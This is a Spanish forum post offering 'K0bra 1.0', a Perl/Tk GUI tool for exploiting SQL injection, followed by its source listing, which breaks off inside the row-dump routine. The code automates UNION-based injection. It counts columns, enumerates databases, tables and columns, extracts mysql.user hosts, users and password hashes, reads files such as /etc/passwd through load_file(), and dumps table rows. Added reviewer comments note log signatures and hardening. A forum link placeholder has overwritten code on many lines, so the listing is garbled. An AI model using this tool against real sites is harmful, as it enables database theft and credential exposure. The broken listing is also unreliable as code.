
[Perl Tk] K0bra 1.0


Desconectado BigBear

« en: Julio 03, 2011, 10:01:34 pm »
Hola, les dejo un programa para escanear la vulnerabilidad de inyección SQL de una forma
avanzada.

Opciones

  • Escanea el número de columnas
  • Busca el número mágico automáticamente y muestra datos sobre la DB
  • Dumpea mysql.user
  • Lista las bases de datos encontradas, así como tablas y columnas
  • Permite visualizar archivos con load_file()
  • Codificación y decodificación para ASCII y hex
  • Dumpea valores sobre cualquier columna
  • Guarda todos los registros en un archivo de texto con el nombre de la web



Imagenes







Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use LWP::UserAgent;
  7. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  8. use Win32;
  9.  
  # Shared defaults. $bypass is the style handed to bypass(); "--" matches neither of
  # the two special cases tested there, so its fallback pair is the one in use.
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  # NOTE(review): `use` is resolved at compile time, so this guard does not make the
  # Win32::Console import conditional; the unconditional `use Win32;` above already
  # ties the script to Windows.
  13. if ($^O eq 'MSWin32') {
  14. use Win32::Console;
  15. Win32::Console::Free();
  16. }
  17.  
  # A single HTTP client is shared by every request (see toma). The 5-second timeout
  # and the hard-coded User-Agent never change during a run. The agent string has no
  # space between "Gecko/20080201" and "Firefox/2.0.0.12", which makes it a
  # distinctive value to search for in web-server access logs.
  18. my $nave = LWP::UserAgent->new();
  19. $nave->timeout(5);
  20. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  21.  
  # Main window: a target entry, one button per action, a details list and three
  # result lists (databases, tables, columns). The default target is a loopback URL.
  # NOTE(review): the text "You are not allowed to view links. Register or Login" is
  # the forum's link placeholder. It has replaced part of the original code on many
  # lines of this listing, so the listing is not valid Perl as shown.
  22. my $logo = MainWindow->new();
  23. $logo->title("k0bra 1.0 (C) Doddy Hackman 2011");
  24. $logo->geometry("500x510+20+20");
  25. $logo->resizable(0,0);
  26. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-You are not allowed to view links. Register or Login=>20);
  27. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=")->place(-You are not allowed to view links. Register or Login=>23,-x=>90);
  28. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start)->place(-You are not allowed to view links. Register or Login=>20,-x=>400);
  29. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-You are not allowed to view links. Register or Login=>70);
  # First button row: schema enumeration, mysql.user extraction and file reading.
  30. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs)->place(-You are not allowed to view links. Register or Login=>110,-x=>40);
  31. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>120);
  32. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb)->place(-You are not allowed to view links. Register or Login=>110,-x=>200);
  33. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow)->place(-You are not allowed to view links. Register or Login=>110,-x=>280);
  34. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile)->place(-You are not allowed to view links. Register or Login=>110,-x=>390);
  35.  
  # Second button row: row dumping, the two converters and the log viewer.
  36. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum)->place(-You are not allowed to view links. Register or Login=>150,-x=>90);
  37. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1)->place(-You are not allowed to view links. Register or Login=>150,-x=>170);
  38. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2)->place(-You are not allowed to view links. Register or Login=>150,-x=>250);
  39. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china)->place(-You are not allowed to view links. Register or Login=>150,-x=>360);
  40.  
  41. $logo->Label(-text=>"Details : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>230,-x=>90);
  42.  
  43. my $informatero = $logo->Listbox(-height=>5,-width=>40)->place(-You are not allowed to view links. Register or Login=>210,-x=>160);
  44.  
  45. $logo->Label(-text=>"Databases",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>60);
  46. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>190);
  47. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>320,-x=>330);
  48.  
  49. my $datero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>40);
  50. my $tablero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>180);
  51. my $columnero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>350,-x=>320);
  52.  
  # Hands control to the Tk event loop; the subs below run as button callbacks.
  53. MainLoop;
  54.  
  # Callback for the "Scan" button. Calls a method on each of the four result lists
  # (presumably to clear them; the method name was lost to the forum's link
  # placeholder), runs the column-count probe on the URL in the target field and,
  # when the probe reports success ($control eq 1), writes the rewritten URL back
  # into the field and calls details(). Otherwise it shows a message box.
  55. sub start {
  56.  
  57. $informatero->You are not allowed to view links. Register or Login("0.0","end");
  58. $datero->You are not allowed to view links. Register or Login("0.0","end");
  59. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  60. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  61.  
  62. my $tengo = $targetero->get;
  63.  
  # The probe (its name is also lost to the placeholder) is called with the literal
  # "--", not with the file-level $bypass. This `my $save` shadows the file-level
  # $save for the rest of the sub.
  64. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($tengo,"--");
  65. if ($control eq 1) {
  66. $logo->update;
  67. $targetero->configure(-text=>$gen);
  68. details($gen,$bypass,$save);
  69. } else {
  70. Win32::MsgBox("Not found length columns",0,"K0bra 1.0");
  71. }
  72. }
  73.  
  # Column-count probe; the sub's name was lost to the forum's link placeholder.
  # Input: $_[0] is the base URL, $_[1] the bypass style. start() unpacks three
  # values from its result.
  # Defender view: every request built here goes out through toma() as a GET, so the
  # SQL keywords (`order by`, `union select`, `char(`) sit in the query string. They
  # are visible in access logs and to filtering rules that normalise `+`, `/**/` and
  # `%20` before matching.
  74. sub You are not allowed to view links. Register or Login {
  75. my $rows  = "0";
  76. my $asc;
  77. my $page = $_[0];
  78. ($pass1,$pass2) = &bypass($_[1]);
  # First request: an ORDER BY with a column index far beyond any real table.
  79. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  80. $code = toma($inyection);
  81. $logo->update;
  82.  
  # The probe continues only if the response body contains a PHP/MySQL error string.
  # Returning generic error pages to clients (errors logged server-side only) removes
  # this signal; parameterised queries remove the underlying flaw.
  83. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  84.  
  85. $logo->update;
  86.  
  # Same request with a false and then a true condition; the two bodies are compared.
  87. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);
  88. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);
  89.  
  90. unless ($testar1 eq $testar2) {
  # $1 is set only when the first pattern above matched: it is the text between
  # <b> and </b> in the warning, recorded further down as a full path disclosure.
  91. my $patha = $1;
  92. $logo->update;
  93. You are not allowed to view links. Register or Login $patha;
  94. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  95. $total = "1";
  # Up to 199 further requests, each adding one more char(...) value built from
  # RATSXPDOWN<n>RATSXPDOWN; the response body is then searched for that marker. A
  # burst of near-identical requests whose char(...) list keeps growing is a strong
  # signature in access logs.
  96. for my $rows(2..200) {
  97. $logo->update;
  98. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  99. $total.= ",".$rows;
  100. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  101. $test = toma($injection);
  102. if ($test=~/RATSXPDOWN/) {
  103. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  104. $control = 1;
  # On a hit the findings are appended to logs/webs/<host>.txt through savefile() and
  # shown in the details list.
  105. my $save = comer($_[0]);
  106. savefile($save.".txt","\n[Target confirmed] : $page");
  107. savefile($save.".txt","[Bypass] : $_[1]\n");
  108. savefile($save.".txt","[Limit] : The site has $rows columns");
  109. savefile($save.".txt","[Data] : The number @number print data");
  110. $informatero->insert("end","[+] The site has $rows columns");
  111. $informatero->insert("end","[+] The number @number print data");
  112. if ($patha) {
  113. savefile($save.".txt","[Full Path Discloure] : $patha");
  114. }
  # The first reflected column number in $total appears to be swapped for the literal
  # "hackman" (the operator itself is lost to the placeholder); the other subs look
  # for that word in the target URL.
  115. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  116. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  117. You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  118. }
  119. }
  120. }
  121. } else {
  122. Win32::MsgBox("Not vulnerable",0,"K0bra 1.0");
  # NOTE(review): this `next` is not inside any loop.
  123. next;
  124. }
  125. }
  126.  
  # Capability checks against a URL that already contains the "hackman" placeholder.
  # Parameters: $page (URL), $bypass (style passed to bypass()), $save (log file stem).
  # Results go to the details list and to logs/webs/<stem>.txt.
  # Hardening: the web application's database account should hold neither SELECT on
  # mysql.user nor the FILE privilege; without them the second and third probes
  # below cannot succeed.
  127. sub details {
  128. my ($page,$bypass,$save) = @_;
  129. ($pass1,$pass2) = &bypass($bypass);
  130. savefile($save.".txt","\n");
  131. if ($page=~/(.*)hackman(.*)/ig) {
  # $start/$end are the URL text before and after the placeholder.
  132. my  ($start,$end) = ($1,$2);
  # char(69,82,84,79,82,56,53,52) is the ASCII for ERTOR854, the marker searched for
  # in each response. Three probes follow: information_schema.tables, mysql.user,
  # and load_file() on 0x2f6574632f706173737764, which is hex for /etc/passwd.
  133. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  134. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  135. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  136. $test1 = toma($inforschema);
  137. $test2 = toma($mysqluser);
  138. $informatero->insert("end","");
  139. if ($test2=~/ERTOR854/ig) {
  140. savefile($save.".txt","[mysql.user] : ON");
  141. $informatero->insert("end","[mysql.user] : ON");
  142. } else {
  143. $informatero->insert("end","[mysql.user] : OFF");
  144. savefile($save.".txt","[mysql.user] : OFF");
  145. }
  146. if ($test1=~/ERTOR854/ig) {
  147. $informatero->insert("end","[information_schema.tables] : ON");
  148. savefile($save.".txt","[information_schema.tables] : ON");
  149. } else {
  150. $informatero->insert("end","[information_schema.tables] : OFF");
  151. savefile($save.".txt","[information_schema.tables] : OFF");
  152. }
  # There is no OFF branch for load_file: a failed probe is simply not reported.
  153. if ($test3=~/ERTOR854/ig) {
  154. $informatero->insert("end","[load_file] : ON");
  155. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  156. }
  # Final request: version(), database() and user(), separated by the marker.
  157. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  158. $injection = $start.$concat.$end.$pass2;
  159. $code = toma($injection);
  160. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  161. $informatero->insert("end","");
  162. $informatero->insert("end","[+] DB Version : $1");
  163. $informatero->insert("end","[+] DB Name : $2");
  164. $informatero->insert("end","[+] user_name : $3");
  165. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  166. } else {
  167. Win32::MsgBox("Not Found DB Info",0,"K0bra 1.0");
  168. }
  169. }
  170. }
  171.  
  172.  
  # Callback for "Get DBS": fills the database list from information_schema.schemata.
  # One request fetches Count(*), then the loop sends one request per offset with
  # LIMIT <n>,1. In access logs this shows as a run of requests that differ only in
  # the LIMIT offset.
  # char(82,65,84,83,88,80,68,79,87,78,49) is the ASCII for RATSXPDOWN1, the marker
  # matched in each response.
  # NOTE(review): the substitution operator on the two rewrite lines and a function
  # name inside unhex(...) were lost to the forum's link placeholder.
  173. sub getdbs {
  174. $datero->You are not allowed to view links. Register or Login("0.0","end");
  175. my $page = $targetero->get;
  176. my $save = comer($page);
  177. my $page1 = $page;
  178. savefile($save.".txt","\n");
  179. ($pass1,$pass2) = &bypass($bypass);
  180. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  181. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  182. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  183. my $limita = $1;
  184. $logo->update;
  185. savefile($save.".txt","[+] Databases Length : $limita\n");
  186. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  187. $real = "1";
  # The range 0..$limita is inclusive, so count+1 requests are sent.
  188. for my $limit(0..$limita) {
  189. $logo->update;
  190. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  191. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  192. my $control = $1;
  # The three schema names below are left out of the list and the log.
  193. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  194. $datero->insert("end",$control);
  195. savefile($save.".txt","[Database $real Found] : $control");
  196. $real++;
  197. }
  198. }
  199. }
  200. } else {
  201. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  202. }
  203. }
  204.  
  205.  
  # Callback for "Get Tables": for each database selected in the database list,
  # reads Count(*) and then table_name from information_schema.tables, one row per
  # request (LIMIT <n>,1). The schema name is sent as char(...) built by ascii(), so
  # the request carries no quoted string. Matches are added to the table list as
  # "<db>.<table>" and appended to the log file.
  # The marker in each response is RATSXPDOWN1 (the char(82,...,49) sequence).
  206. sub schematablesdb {
  207.  
  208. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  209.  
  210. my $page = $targetero->get;
  211.  
  212. my $save = comer($page);
  213.  
  214. $d = $datero->curselection();
  215.  
  216. for my $id (@$d) {
  217. my $db = $datero->get($id);
  218.  
  219. my $page1 = $page;
  220. savefile($save.".txt","\n");
  221. ($pass1,$pass2) = &bypass($bypass);
  222. savefile($save.".txt","[DB] : $db");
  # NOTE(review): $page is rewritten in place on the first pass through this loop,
  # and $page1 is copied from it at the top of every pass.
  223. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  224. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  225. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  226. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  227. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  228. $logo->update;
  229. savefile($save.".txt","[+] Tables Length :  $1\n");
  230. my $limit = $1;
  231. $real = "1";
  # The range is inclusive, so count+1 requests are sent.
  232. for my $lim(0..$limit) {
  233. $logo->update;
  234. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  235. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  236. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  237. my $table = $1;
  238. You are not allowed to view links. Register or Login $table;
  239. savefile($save.".txt","[Table $real Found : $table ]");
  240. $tablero->insert("end",$db.".".$table);
  241. $real++;
  242. }}
  243. } else {
  244. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  245. }}}
  246.  
  # Callback for "Get Columns": for each "<db>.<table>" entry selected in the table
  # list, reads Count(*) and then column_name from information_schema.columns, one
  # row per request (LIMIT <n>,1). Both names are sent as char(...) built by ascii().
  # Results go to the column list and the log file.
  # The marker in each response is RATSXPDOWN1 (the char(82,...,49) sequence).
  247. sub schemacolumnsdb {
  248.  
  249. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  250.  
  251. my $page = $targetero->get;
  252. my $save = comer($page);
  253.  
  254. $d = $tablero->curselection();
  255.  
  256. for my $id (@$d) {
  257. my $da = $tablero->get($id);
  258.  
  # The greedy (.*) splits the entry at its last dot.
  259. if ($da=~/(.*)\.(.*)/) {
  260. my ($db,$table) = ($1,$2);
  261.  
  262. my $page3 = $page;
  263. my $page4 = $page;
  264.  
  265. savefile($save.".txt","\n");
  266. ($pass1,$pass2) = &bypass($bypass);
  267. savefile($save.".txt","\n[DB] : $db");
  268. savefile($save.".txt","[Table] : $table");
  269. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  270. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  271. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  272. savefile($save.".txt","[Columns length : $1 ]\n");
  273. my $si = $1;
  274. You are not allowed to view links. Register or Login $si;
  275. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  276. $real = "1";
  # The range is inclusive, so count+1 requests are sent.
  277. for my $limit2(0..$si) {
  278. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  279. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  280. $columnero->insert("end",$1);
  281. savefile($save.".txt","[Column $real] : $1");
  282. $real++;
  283. }
  284. }
  285. } else {
  286. Win32::MsgBox("information_schema not found",0,"K0bra 1.0");
  287. }
  288. }
  289. }
  290. }
  291.  
  # Callback for "mysql users": opens a second window with Host / User / Password
  # lists. The nested sub tengorax, bound to the "Extract" button, does the work.
  # Defender view: anything this returns comes from mysql.user. If the application's
  # database account can read that table, every account listed in it should be
  # treated as exposed and its credentials rotated; the durable fix is to revoke
  # that access.
  292. sub mynow {
  293.  
  294. my $p = $targetero->get;
  295.  
  296. $mi = MainWindow->new();
  297. $mi->title("Mysql Extractor");
  298. $mi->geometry("500x310+20+20");
  299. $mi->resizable(0,0);
  300.  
  301. $mi->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  302. my $guix = $mi->Entry(-width=>40,-text=>$p)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  303. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  304.  
  305. $mi->Label(-text=>"Host",-font=>"Impact1")->place(-x=>60,-You are not allowed to view links. Register or Login=>120);
  306. $mi->Label(-text=>"User",-font=>"Impact1")->place(-x=>200,-You are not allowed to view links. Register or Login=>120);
  307. $mi->Label(-text=>"Password",-font=>"Impact1")->place(-x=>360,-You are not allowed to view links. Register or Login=>120);
  308.  
  309. my $hostero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>40);
  310. my $usero = $mi->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>150,-x=>180);
  311. my $pasero = $mi->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>150,-x=>340);
  312.  
  313.  
  # Sends three kinds of request against mysql.user: a reachability check, a
  # Count(*), then one request per row (LIMIT <n>,1) for Host, User and Password.
  314. sub tengorax {
  315.  
  316. my $page = $guix->get;
  317. my $save = comer($page);
  318.  
  319. my $cop = $page;
  320. my $cop1 = $page;
  321. savefile($save.".txt","\n");
  322.  
  323. ($pass1,$pass2) = &bypass($bypass);
  324. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  325. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  326. if ($code=~/RATSXPDOWN/ig){
  327. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  328. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  329. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  330. $mi->update;
  331. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  332. for my $limit(0..$1) {
  333. $mi->update;
  # 0x524154535850444f574e is hex for RATSXPDOWN, used here as the field separator.
  334. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  335. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  336. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  337. $mi->update;
  338. $hostero->insert("end",$1);
  339. $usero->insert("end",$2);
  340. $pasero->insert("end",$3);
  # The three values are written in clear text to logs/webs/<host>.txt.
  341. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  342. } else {
  # The loop stops at the first row that does not come back.
  343. last;
  344. }}}
  345. } else {
  346. Win32::MsgBox("mysql.user not found",0,"K0bra 1.0");
  347. }
  348. }
  349. }
  350.  
  # Callback for "load_file": opens a window with a target entry, a file-path entry
  # and a read-only output pane. Two nested subs are bound to its buttons: eno
  # toggles the path between plain and 0x-hex form, ena requests the file.
  # Defender view: load_file() reads files with the database server's own
  # permissions. It needs the FILE privilege on the connecting account and is
  # further limited by the server's secure_file_priv setting; an application
  # account should not hold FILE.
  351. sub myfile {
  352.  
  353. my $pag = $targetero->get;
  354.  
  355. $loa = MainWindow->new();
  356. $loa->title("load_file helper");
  357. $loa->geometry("380x400+20+20");
  358. $loa->resizable(0,0);
  359.  
  360. $loa->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  361. my $aa = $loa->Entry(-width=>40,-text=>$pag)->place(-You are not allowed to view links. Register or Login=>23,-x=>80);
  362. $loa->Label(-text=>"File : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>60,-x=>23);
  363. my $tea = $loa->Entry(-width=>20,-text=>"C:\leer.txt")->place(-You are not allowed to view links. Register or Login=>63,-x=>63);
  364. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno)->place(-You are not allowed to view links. Register or Login=>62,-x=>200);
  365. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena)->place(-You are not allowed to view links. Register or Login=>62,-x=>263);
  366.  
  367. $loa->Label(-text=>"Output",-font=>"Impact1")->place(-x=>160,-You are not allowed to view links. Register or Login=>130);
  368. my $mo = $loa->ROText(-width=>45,-height=>15)->place(-You are not allowed to view links. Register or Login=>170,-x=>25);
  369.  
  # Text containing "0x" anywhere is passed to decode(), anything else to encode().
  370. sub eno {
  371. my $t = $tea->get;
  372. if ($t=~/0x/) {
  373. $tea->configure(-text=>decode($t));
  374. } else {
  375. $tea->configure(-text=>encode($t));
  376. }
  377. }
  378.  
  # Requests the file named in the entry (hex-encoded by encode()) between two
  # ERTOR854 markers, shows what comes back and appends it to the log file.
  379. sub ena {
  380.  
  381. $mo->You are not allowed to view links. Register or Login("0.0","end");
  382.  
  383. my $page = $aa->get;
  384. my $save = comer($page);
  385.  
  386. savefile($save.".txt","\n");
  387. ($pass1,$pass2) = &bypass($bypass);
  388. if ($page =~/(.*)hackman(.*)/g) {
  389. my $start = $1; my $end = $2;
  390. my $file = $tea->get;
  391. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
  392. $code = toma($start.$concat.$end.$pass2);
  # Without /s the dot does not match newlines, so only content on a single line
  # between the two markers is captured.
  393. if ($code =~/ERTOR854(.*)ERTOR854/g) {
  394. $mo->insert("end",$1);
  395. savefile($save.".txt","[File Found] : $file");
  396. savefile($save.".txt","\n[Source Start]\n");
  397. savefile($save.".txt","$1");
  398. savefile($save.".txt","\n[Source End]\n");
  399. } else {
  400. Win32::MsgBox("Error",0,"K0bra 1.0");
  401. }}}}
  402.  
  # Callback for "Dump": opens a window with entries for target, table and two
  # column names, plus two result lists. The nested sub tengor, bound to "Extract",
  # sends count(<column1>) and then one request per row (LIMIT <n>,1) for both
  # columns, separated by the ERTOR854 marker.
  # Defender view: this is bulk row extraction, one request per row through the
  # injectable parameter. A long run of requests that differ only in the LIMIT
  # offset is what it leaves in access logs.
  403. sub dum {
  404.  
  405. my $pa = $targetero->get;
  406.  
  407. $max = MainWindow->new();
  408. $max->title("Dump Values");
  409. $max->geometry("480x380+20+20");
  410. $max->resizable(0,0);
  411.  
  412. $max->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  413. my $tata = $max->Entry(-width=>40,-text=>$pa)->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  414.  
  415. $max->Label(-text=>"Table : ",-font=>"Impact1")->place(-x=>50,-You are not allowed to view links. Register or Login=>60);
  416. my $tato = $max->Entry(-width=>20)->place(-x=>105,-You are not allowed to view links. Register or Login=>63);
  417.  
  418. $max->Label(-text=>"Column1 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>90,-x=>50);
  419. my $tatu = $max->Entry(-width=>20)->place(-x=>130,-You are not allowed to view links. Register or Login=>93);
  420.  
  421. $max->Label(-text=>"Column2 : ",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>130,-x=>50);
  422. my $tita= $max->Entry(-width=>20)->place(-You are not allowed to view links. Register or Login=>133,-x=>130);
  423.  
  424.  
  425. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor)->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  426.  
  427. $max->Label(-text=>"Column1",-font=>"Impact1")->place(-x=>100,-You are not allowed to view links. Register or Login=>180);
  428. $max->Label(-text=>"Column2",-font=>"Impact1")->place(-x=>300,-You are not allowed to view links. Register or Login=>180);
  429.  
  430. my $duta1 = $max->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>210,-x=>70);
  431. my $duta2 = $max->Listbox(-width=>23)->place(-You are not allowed to view links. Register or Login=>210,-x=>260);
  432.  
  433.  
  434. sub tengor {
  435.  
  436. $duta1->You are not allowed to view links. Register or Login("0.0","end");
  437. $duta2->You are not allowed to view links. Register or Login("0.0","end");
  438.  
  439. my $page = $tata->get;
  440. my $tabla = $tato->get;
  441. my $col1 = $tatu->get;
  442. my $col2 = $tita->get;
  443.  
  444. my $save = comer($page);
  445.  
  446. savefile($save.".txt","\n");
  447.  
  448. ($pass1,$pass2) = &bypass($bypass);
  449. if ($page=~/(.*)hackman(.*)/){
  450. my $start = $1;
  451. my $end = $2;
  # Table and column names typed into the entries are placed in the request as-is.
  452. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  453. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  454. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  455. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  456. $tota = $1;
  457. savefile($save.".txt","[Table] : $tabla");
  458. savefile($save.".txt","[+] Length of the rows: $tota\n");
  459. savefile($save.".txt","[$col1] [$col2]\n");
  460. for my $limit(0..$tota) {
  461. You are not allowed to view links. Register or Login $limit;
